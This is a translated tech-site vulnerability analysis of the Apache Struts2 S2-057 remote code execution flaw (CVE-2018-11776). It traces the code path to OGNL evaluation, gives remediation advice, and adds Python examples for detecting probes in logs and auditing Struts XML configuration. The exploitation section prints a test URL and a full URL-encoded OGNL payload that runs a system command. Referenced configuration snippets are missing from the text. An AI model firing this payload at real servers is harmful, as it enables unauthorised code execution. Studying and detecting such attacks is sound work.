2025-01-18 Update From: SLTechnology News&Howtos, Network Security
Shulou(Shulou.com)05/31 Report--
Today I will walk you through an example analysis of the Apache Struts2 S2-057 remote code execution vulnerability. Many people may not understand it well, so the editor has summarized the following content to make it easier to follow; I hope you get something out of this article.
I. Background introduction
The Apache Struts framework is an open source Web application framework built on Java Servlets, JavaBeans and JavaServer Pages (JSP). Struts follows the Model-View-Controller (MVC) design pattern and can be used to build complex Web applications.
It lets us separate the business logic, control logic and presentation logic of an application, making it more reusable and maintainable. The Struts framework is part of the Jakarta project and is managed by the Apache Software Foundation.
1.1 Vulnerability description
When struts.mapper.alwaysSelectFullNamespace is set to true, and the namespace value is missing from the package tag and from the param tag of the result (or a wildcard is used in it), the namespace becomes attacker-controlled. That namespace is eventually passed into OGNL evaluation, which results in a remote code execution vulnerability.
1.2 Affected versions
Apache Struts 2.3 through 2.3.34
Apache Struts 2.5 through 2.5.16
1.3 Vulnerability number
CVE-2018-11776
II. Environment setup
1. Download: http://archive.apache.org/dist/struts/2.3.34/struts-2.3.34-all.zip
2. Modify the configuration file struts-actionchaining.xml
This vulnerability has several attack vectors, including:
2.1 Redirect action
2.2 Action chaining
2.3 Postback result
Taking the first as an example, modify the content of the configuration file to:
III. Vulnerability details
Look at the parseNameAndNamespace method of the DefaultActionMapper class.
When alwaysSelectFullNamespace is set to true, the value of namespace is taken from the URL. The URL is controllable, so namespace is controllable as well.
After the Action finishes executing, the program calls the execute() method of the ServletActionRedirectResult class to process the redirect Result.
First, when namespace is empty, invocation.getProxy().getNamespace() is called to assign the namespace variable, and namespace is then passed into the ActionMapping constructor.
ActionMapper.getUriFromActionMapping() then reassembles the values in the ActionMapping into a URL string (including the namespace) and assigns it to the tmpLocation variable.
The tmpLocation value, which carries the namespace, is then passed to the setLocation() method.
This method assigns the tmpLocation value to the location variable of the StrutsResultSupport class.
Next, follow the super.execute() call.
Continue tracing super.execute() in the ServletRedirectResult class.
In the execute() method of the StrutsResultSupport class, the location variable that was just assigned (and still carries the namespace) is passed to the conditionalParse() method.
Finally, TextParseUtil.translateVariables() evaluates the namespace as OGNL, which results in remote code execution.
IV. Vulnerability exploitation
1. Access the URL /${(111+111)}/actionChain1.action.
The access triggers the OGNL expression and the URL becomes /222/register2.action, which confirms that the vulnerability exists.
2. Payload:
% 24% 7b (% 23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS). (% 23ct%3d%23request%5b%27struts.valueStack%27%5d.context). (% 23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d). (% 23ou%3d%23cr.getInstance (% 40com.opensymphony.xwork2.ognl.OgnlUtil%40class)). (% 23ou.getExcludedPackageNames (). Clear ()). (% 23ou.getExcludedClasses (). Clear ()). 23ct.setMemberAccess (% 23dm). (% 23cmd%3d%40java.lang.Runtime%40getRuntime () .exec (% 22calc%22))% 7d
This payload only works for the 2.3 series.
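The check that confirms the vulnerability above rides on an OGNL expression placed in the namespace segment of the request path, so the same marker is what a defender should hunt for in access logs. The following is an added example (not code from the original article) that scans constructed common-log-format lines, percent-decodes the request path repeatedly so that double-encoded probes are not missed, and flags any path segment that opens an OGNL expression with `${` or `%{`. The log lines, IP addresses and timestamps are constructed for illustration, and the log format is assumed to be the Apache/nginx common format.

```python
"""Flag S2-057-style probing in access logs: an OGNL expression opener
(${ or %{) inside the request *path*, where Struts reads the namespace.

Added example, not part of the original article. Sample log lines below
are constructed; the log format is assumed to be common/combined format.
"""
import re
from urllib.parse import unquote

# Request field of a common-log line: "METHOD /target HTTP/x.y"
_REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# OGNL expression openers, checked after percent-decoding.
_OGNL_MARKER_RE = re.compile(r"[$%]\{")


def request_path(log_line):
    """Return the request target (path plus query) from a log line, or None."""
    m = _REQUEST_RE.search(log_line)
    return m.group("target") if m else None


def decode_path(target, max_rounds=3):
    """Strip the query string and percent-decode the path until it is stable.
    Several rounds catch double-encoded probes such as %2524%257B."""
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def path_has_ognl_marker(target):
    """True if the decoded path contains ${ or %{.
    The query string is deliberately ignored: S2-057 abuses the path."""
    return _OGNL_MARKER_RE.search(decode_path(target)) is not None


def flag_s2_057_probes(log_lines):
    """Return (line_number, decoded_path) for every suspicious request."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        target = request_path(line)
        if target is not None and path_has_ognl_marker(target):
            hits.append((n, decode_path(target)))
    return hits


# Constructed sample log: a probe like the article's, benign traffic,
# OGNL only in the query string, a double-encoded probe, the %{ form,
# and a line that is not a request at all.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/May/2019:10:00:00 +0000] "GET /%24%7B(111%2B111)%7D/actionChain1.action HTTP/1.1" 302 0',
    '10.0.0.6 - - [31/May/2019:10:00:01 +0000] "GET /index.action HTTP/1.1" 200 512',
    '10.0.0.7 - - [31/May/2019:10:00:02 +0000] "GET /search.action?q=%24%7Bx%7D HTTP/1.1" 200 512',
    '10.0.0.8 - - [31/May/2019:10:00:03 +0000] "GET /%2524%257B(1)%257D/a.action HTTP/1.1" 302 0',
    '10.0.0.9 - - [31/May/2019:10:00:04 +0000] "GET /%25%7B1%7D/x.action HTTP/1.1" 302 0',
    'not a request line',
]

if __name__ == "__main__":
    for line_no, path in flag_s2_057_probes(SAMPLE_LOG):
        print(f"line {line_no}: {path}")
```

The rule matches on the path only, because the namespace Struts feeds into OGNL is taken from the path; a 302 response to such a request, as in the first sample line, is the same redirect the article describes and is worth correlating with the flagged path.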
V. Remediation suggestions
Official patch
The official release that fixes this vulnerability is available. Affected users should upgrade to Apache Struts 2.3.35 or Struts 2.5.17 as soon as possible.
https://struts.apache.org/download.cgi#struts2517
Manual fix
Modify the configuration file:
Set a fixed namespace value on the package tag and on the result's param tag, and do not use wildcards.
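The environment setup above edits struts-actionchaining.xml so that the package carries no namespace and the redirect result does not pin one, and the manual fix reverses exactly that. The following added example (not code from the article or from the Struts project) audits a Struts XML configuration for that pattern: a package whose namespace is missing or contains a wildcard, holding a redirectAction, chain or postback result with no `<param name="namespace">`. It embeds two constructed fragments, one mirroring the lab setup and one after the manual fix; the action class name `example.ActionChain1` and the namespace `/actionchaining` are assumptions, not values from the article.

```python
"""Audit a Struts 2 XML configuration for the S2-057 preconditions the
article describes: a <package> without a namespace (or with a wildcard in
it) holding a redirectAction / chain / postback <result> that does not pin
its own namespace with <param name="namespace">.

Added example, not Struts project code. The two fragments below are
constructed; the action class and namespace values are assumptions.
"""
import xml.etree.ElementTree as ET

# Result types whose target URL is rebuilt from the request namespace,
# i.e. the three vectors the article lists.
NAMESPACE_SENSITIVE_RESULTS = {"redirectAction", "chain", "postback"}


def package_namespace_is_weak(pkg):
    """True if the package has no namespace attribute or uses a wildcard."""
    ns = pkg.get("namespace")
    return ns is None or ns.strip() == "" or "*" in ns


def result_has_namespace_param(result):
    """True if the <result> pins its namespace via <param name="namespace">."""
    return any(
        p.get("name") == "namespace" and (p.text or "").strip()
        for p in result.findall("param")
    )


def audit_struts_config(xml_text):
    """Return (package, action, result type) for each result that matches
    the vulnerable pattern; an empty list means no finding."""
    root = ET.fromstring(xml_text)
    findings = []
    for pkg in root.iter("package"):
        if not package_namespace_is_weak(pkg):
            continue
        for action in pkg.findall("action"):
            for result in action.findall("result"):
                rtype = result.get("type", "dispatcher")
                if rtype in NAMESPACE_SENSITIVE_RESULTS and not result_has_namespace_param(result):
                    findings.append((pkg.get("name"), action.get("name"), rtype))
    return findings


# Constructed fragment mirroring the lab setup: no namespace on the
# package and a redirectAction result with no namespace param.
VULNERABLE_CONFIG = """<struts>
  <package name="actionchaining" extends="struts-default">
    <action name="actionChain1" class="example.ActionChain1">
      <result type="redirectAction">
        <param name="actionName">register2</param>
      </result>
    </action>
  </package>
</struts>"""

# Constructed fragment after the manual fix: a fixed, non-wildcard
# package namespace plus an explicit namespace param on the result.
FIXED_CONFIG = """<struts>
  <package name="actionchaining" namespace="/actionchaining" extends="struts-default">
    <action name="actionChain1" class="example.ActionChain1">
      <result type="redirectAction">
        <param name="actionName">register2</param>
        <param name="namespace">/actionchaining</param>
      </result>
    </action>
  </package>
</struts>"""

if __name__ == "__main__":
    for label, cfg in (("vulnerable", VULNERABLE_CONFIG), ("fixed", FIXED_CONFIG)):
        print(label, audit_struts_config(cfg))
```

Running the audit across every struts*.xml in a deployment gives a quick list of results to pin down before (or alongside) the upgrade; a wildcard namespace such as `/a/*` is reported the same way as a missing one, matching the article's advice not to use wildcards.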
After reading the above, do you have a better understanding of the Apache Struts2 S2-057 remote code execution vulnerability example analysis? If you want to learn more, please follow the industry information channel. Thank you for your support.